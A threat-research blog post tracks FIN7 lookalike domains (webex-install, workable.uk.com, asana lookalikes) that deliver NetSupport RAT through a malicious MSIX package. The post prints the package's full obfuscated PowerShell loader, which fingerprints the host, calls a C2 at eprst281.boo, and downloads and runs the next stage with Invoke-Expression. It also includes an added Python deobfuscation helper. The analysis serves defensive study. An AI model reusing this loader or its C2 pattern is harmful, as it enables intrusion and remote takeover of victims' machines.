FIN7 Abusing Malicious MSIX Packages To Deliver NetSupport RAT

rewscel
5 min read · May 1, 2024

Quick note: This post is an attempt to share what I’ve learned while doing some research about this specific group (FIN7). I am newer to this and hope to continue to learn along the way.

Who is FIN7?

A quick introduction to the group: FIN7 is a financially motivated Russian advanced persistent threat (APT) group.

Lookalike Domains

The criminal group uses several techniques for initial access, but in this post the focus is on Acquire Infrastructure: Domains, as this is what has been observed more recently. While looking around in a Discord server I noticed a user had shared two IOCs, which allowed me to pivot from:

  • winscp-install[.]com
  • webex-install[.]com

My initial go-to was to check VirusTotal for webex-install[.]com, and immediately there were signs of it being malicious.

Out of curiosity I decided to navigate to the site, but unfortunately I was met with an “Error 404” page. Note that the creation date is 23 days ago, so this is not uncommon to see. Checking the relations of this domain is how I was able to pivot and find other domains related to FIN7 activity.

The focus was on the IP 89.105.198[.]190. As we can see, the same domain webex-install[.]com appears among its resolutions. There are also two other domains which were quite interesting to me:

  • webex-install[.]com
  • workable[.]uk[.]com
  • lexisnexis[.]day

I then attempted to navigate to the workable[.]uk[.]com domain, hoping I would not receive another 404 error. Thankfully, I did not run into that error and was instead prompted with this:

Fake Browser Extension Install Impersonating Workable

Upon clicking install, an MSIX file will be downloaded from:

  • hxxp://eprst281[.]boo/files/Workable_4.12.7.msix

Brief Analysis

A great resource to learn how MSIX files work and how they are being abused by different threat actors can be found here. From what has been seen so far, the MSIX files are signed using the same code signing certificate, which has now been revoked:

After extracting the MSIX file, its contents can be seen:

The file of interest is the obfuscated PowerShell script. It fingerprints the host (OS caption, domain, and installed AV products from root\SecurityCenter2), sends that to the C2 as query-string parameters, and then base64/UTF-16 decodes and invokes whatever comes back:

$ichdTJY = Start-Job -ScriptBlock {
$oPAEkmmjPyzy = (Get-WmiObject -Class Win32_OperatingSystem).Caption
$wDanVOwR = '28'
$wfzmlszgmVtQUYUUwRt = '30728cf7-bb0d-4a33-bdfd-a6b7ed6a5ef5'
$fhchgWPVrqIqUPqgcOOO = [System.Net.WebUtility]::UrlEncode($oPAEkmmjPyzy)
$LUxRscsKKBRth = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain
$nlSPbOnSAQYuMuAI = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
$aUWolpXvzrtSDvyklrHkCEl = $nlSPbOnSAQYuMuAI | ForEach-Object {
$_.displayName
}
$tpfsK = $aUWolpXvzrtSDvyklrHkCEl -join ", "
$AFyMFqIXvpe = "w"
$NivxTxiACKAPfyA = (New-Guid).ToString()
$snQQaaojQUQstasltzdn = New-Object Net.WebClient
$snQQaaojQUQstasltzdn.Headers.Add("User-Agent", "myUserAgentHere")
$HDcwONNbcuwjMjl = "?mUmaTqeCSyapz=$tpfsK&kGv=$LUxRscsKKBRth&N=$fhchgWPVrqIqUPqgcOOO&jie=$($wDanVOwR)&WdrFptFnYp=$wfzmlszgmVtQUYUUwRt&File=file&An=$AFyMFqIXvpe&eobpWq=$NivxTxiACKAPfyA"
$myBOCBakmwZ = "https"+":"+"//"+"eprst2"+"8"+"1.boo/736"+"8"+"9d"+"8"+"a-25b4-41cf-b693-05591ed"+"8"+"04a7-7433f7b1-9997-477b-aadc-5a6e"+"8"+"d233c61" + "$($HDcwONNbcuwjMjl)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($myBOCBakmwZ)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
$FwbZRZhc = "usradm"
if ($DbDTDpCwZMSMMDwgppZg.Contains($FwbZRZhc)) {

try {

$OrHgenwetl = "JVVhwbDxQNpJVpDhVJMMKNDz.ps1"
$Z = "C:\ProgramData\$($OrHgenwetl)"
$DbDTDpCwZMSMMDwgppZg | Out-File -FilePath $Z
$JEVANRLBFtRIItNxJyzwyEL = $OrHgenwetl
$HDcwONNbcuwjMjl = "?DZZZSIVcVkqLoNDwDYUJbI=$($OrHgenwetl)&WdrFptFnYp=$($wfzmlszgmVtQUYUUwRt)"
$MMyfnoiwhzwE = "https"+":"+"//"+"eprst281.boo/bb9c1a14-4e3d-40ab-bcc8-0b84e782"+"5"+""+"5"+"b0-4bed9ff2-0f4e-48fb-92ed-106"+"5"+"fcd8"+"5"+"e01" + "$($HDcwONNbcuwjMjl)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($MMyfnoiwhzwE)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
try {
$kPbNiOPkcsgdOAVdN = "?aklshdjahsjdh=$($wDanVOwR)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($NivxTxiACKAPfyA))"
$xVTdrYOAEg = "https"+":"+"//"+"eprst28"+"1"+".boo/974afa0a-d334-48ec-a0d4-4cc"+"1"+"4efa730c-"+"1"+"d3d044a-e654-4"+"1"+"e3-ad32-38a2934393e4" + "$($kPbNiOPkcsgdOAVdN)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($xVTdrYOAEg)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
}
}
} else {
try {

Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {

$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
try {
$kPbNiOPkcsgdOAVdN = "?aklshdjahsjdh=$($wDanVOwR)&ajhsdjhasjhd=nsp&ahsdjkasjkdh=$($($NivxTxiACKAPfyA))"
$xVTdrYOAEg = "https"+":"+"//"+"eprst28"+"1"+".boo/974afa0a-d334-48ec-a0d4-4cc"+"1"+"4efa730c-"+"1"+"d3d044a-e654-4"+"1"+"e3-ad32-38a2934393e4" + "$($kPbNiOPkcsgdOAVdN)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($xVTdrYOAEg)
$DbDTDpCwZMSMMDwgppZg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($TiihNxiAfUseqsgTigMUrUrBW))
Invoke-Expression $DbDTDpCwZMSMMDwgppZg
}
catch {
$rgswggnIPKzenyMLnTc = $_.Exception.Message
$CbWbXrCrPfNkmEXLD = "?eobpWq=$($NivxTxiACKAPfyA)&oUkejZWCT=$($rgswggnIPKzenyMLnTc)"
$NHwseaODsTum = "https"+":"+"//"+"eprst281.boo/223dc805"+"-"+"5605"+"-"+"4a0b"+"-"+"b828"+"-"+"cdad1b84126e"+"-"+"79d39c2c"+"-"+"0f10"+"-"+"48d1"+"-"+"9edf"+"-"+"c18a784efba0" + "$($CbWbXrCrPfNkmEXLD)"
$TiihNxiAfUseqsgTigMUrUrBW = $snQQaaojQUQstasltzdn.DownloadString($NHwseaODsTum)
}
}
}
}

$FvbEMnv= "https"+":"+"//"+"wo"+"r"+"kable.com/"
Start-Process $FvbEMnv

Receive-Job -Job $ichdTJY -Wait

AnyRun was used to see the infection chain for this specific file, although I had to manually run the PowerShell file: https://app.any.run/tasks/82331874-8edc-421d-8df1-b16f08d5cbd1

What this ends up doing is downloading NetSupport RAT, as shown in the AnyRun task (client32.exe).
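To make the split strings in the script above readable, here is an added Python helper (my own analyst tooling, not part of the original post or the malware): it collapses PowerShell "a"+"b" concatenations back into single literals, extracts and defangs the resulting URLs, and decodes a stage response the same way the script does (base64, then UTF-16LE). The sample input is constructed: the workable.com line is copied from the script, while the C2-style line uses a placeholder domain rather than a real indicator.

```python
import base64
import re

# Constructed sample in the same concatenation style as the script above.
# The first line is the benign workable.com redirect from the script; the
# second mimics a C2 URL line but uses a placeholder domain (not a real IOC).
SAMPLE_SCRIPT = r'''
$FvbEMnv= "https"+":"+"//"+"wo"+"r"+"kable.com/"
$MMyfnoiwhzwE = "https"+":"+"//"+"c2-placeholder.invalid/bb9c"+"1"+"a14-4e3d" + "$($HDcwONNbcuwjMjl)"
$Z = "C:\ProgramData\$($OrHgenwetl)"
'''

# A run of two or more double-quoted literals joined by '+' (spaces optional).
# PowerShell escapes with backtick, not backslash, so a literal is simply [^"]*.
_CONCAT_RE = re.compile(r'"[^"]*"(?:\s*\+\s*"[^"]*")+')


def join_string_concats(script: str) -> str:
    """Collapse "a"+"b"+"c" into "abc" so the split URLs become readable."""
    def _join(match: re.Match) -> str:
        parts = re.findall(r'"([^"]*)"', match.group(0))
        return '"' + "".join(parts) + '"'
    return _CONCAT_RE.sub(_join, script)


def extract_urls(script: str) -> list[str]:
    """Return the de-split http(s) URLs in the script, defanged for reporting.

    The match stops at '$' so PowerShell subexpressions appended to the URL
    (the query string built at runtime) are not included.
    """
    joined = join_string_concats(script)
    urls = re.findall(r'''https?://[^\s"'$]+''', joined)
    return [u.replace("http", "hxxp").replace(".", "[.]") for u in urls]


def decode_stage_response(b64: str) -> str:
    """Decode a C2 response the way the script does: base64 -> UTF-16LE text.

    The script then checks the decoded text for the marker 'usradm' to decide
    whether to drop it to C:\\ProgramData and fetch the next stage.
    """
    return base64.b64decode(b64).decode("utf-16-le")


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_SCRIPT):
        print(url)
```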

Other Domains

With the help of community members NDA0E, RussianPanda9xx, g0njxa, 500mk500, and ValidinLLC (in no particular order), who interacted with the post I had on Twitter (https://x.com/rewscel/status/1785407518522401223), other domains were discovered that are associated with another IP address (94.131.101[.]65):

  • asana[.]tel
  • asana[.]pm
  • asana[.]wf

Tracking

We can track newly created domains by using tools like https://app.validin.com/detail to query the IP addresses found and check their DNS history.

There are also many other ways to track this, since a lot of the sites share similarities. Keeping track of them in Maltego, for example, can be useful:

Samples: https://bazaar.abuse.ch/browse.php?search=serial_number:432291ee2d1f6b4f2d5e1e00

Conclusion

FIN7 is abusing look-alike domains, either in SEO poisoning attacks or in spear phishing campaigns, to drop NetSupport RAT. There are many different ways to profile and pivot off the information shared amongst the community.
